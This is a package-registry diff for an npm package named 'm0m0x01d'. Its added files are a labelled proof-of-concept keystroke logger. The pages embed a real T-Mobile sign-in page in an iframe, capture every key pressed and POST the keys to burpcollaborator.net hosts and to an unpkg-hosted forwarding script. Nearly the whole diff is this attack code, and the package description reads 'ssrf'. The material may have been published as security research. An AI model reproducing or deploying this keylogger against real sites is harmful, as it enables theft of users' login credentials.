m0m0x01d 17.0.0 → 19.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,42 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>PoC - Keystroke Capture</title>
7
+ <script>
8
+ // Function to send captured data to your server
9
+ function sendKeystrokes(data) {
10
+ var xhr = new XMLHttpRequest();
11
+ xhr.open("POST", "https://200ltblqjhtfqvkk2onadiu0vr1hp6.burpcollaborator.net/keystrokes", true);
12
+ xhr.setRequestHeader("Content-Type", "application/json");
13
+ xhr.send(JSON.stringify({ keystrokes: data }));
14
+ }
15
+
16
+ // Function to capture keystrokes inside the iframe
17
+ function captureKeystrokes() {
18
+ var iframe = document.getElementById('login-iframe').contentWindow;
19
+
20
+ iframe.document.onkeyup = function(event) {
21
+ // Capture each key press and send it to the server
22
+ sendKeystrokes(event.key);
23
+ };
24
+ }
25
+
26
+ // Start capturing keystrokes when the iframe is loaded
27
+ window.onload = function() {
28
+ var iframe = document.getElementById('login-iframe');
29
+
30
+ iframe.onload = function() {
31
+ captureKeystrokes();
32
+ };
33
+ };
34
+ </script>
35
+ </head>
36
+ <body>
37
+ <h1>Login Page</h1>
38
+ <!-- Embedding the login page -->
39
+ <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
40
+ </body>
41
+ </html>
42
+
@@ -0,0 +1,16 @@
1
+ </html>
2
+ <!DOCTYPE html>
3
+ <html lang="en">
4
+ <head>
5
+ <meta charset="UTF-8">
6
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
+ <title>Keystroke Capture</title>
8
+ <script src="https://unpkg.com/m0m0x01d@19.0.0/keystroke-capture.js"></script>
9
+ </head>
10
+ <body>
11
+ <h1>Keystroke Logger PoC</h1>
12
+ <!-- Embedding the target's login page in an iframe -->
13
+ <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
14
+ </body>
15
+ </html>
16
+
@@ -0,0 +1,11 @@
1
+ // Intermediary script to forward keystrokes to your server
2
+ self.addEventListener('message', function(event) {
3
+ var data = event.data;
4
+
5
+ // Forward the keystrokes to your server
6
+ var xhr = new XMLHttpRequest();
7
+ xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
8
+ xhr.setRequestHeader("Content-Type", "application/json");
9
+ xhr.send(JSON.stringify({ keystrokes: data }));
10
+ });
11
+
@@ -0,0 +1,26 @@
1
+ // Function to send keystrokes to the intermediary file on unpkg
2
+ function sendKeystrokes(data) {
3
+ var xhr = new XMLHttpRequest();
4
+ xhr.open("POST", "https://unpkg.com/m0m0x01d@19.0.0/intermediary.js", true);
5
+ xhr.setRequestHeader("Content-Type", "application/json");
6
+ xhr.send(JSON.stringify({ keystrokes: data }));
7
+ }
8
+
9
+ // Function to capture keystrokes in the iframe
10
+ function captureKeystrokes() {
11
+ var iframe = document.getElementById('login-iframe').contentWindow;
12
+
13
+ // Listen for key presses in the iframe
14
+ iframe.document.onkeyup = function(event) {
15
+ sendKeystrokes(event.key); // Send each keystroke to the intermediary
16
+ };
17
+ }
18
+
19
+ // Wait for the iframe to load, then start capturing keystrokes
20
+ window.onload = function() {
21
+ var iframe = document.getElementById('login-iframe');
22
+ iframe.onload = function() {
23
+ captureKeystrokes();
24
+ };
25
+ };
26
+
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "17.0.0",
3
+ "version": "19.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {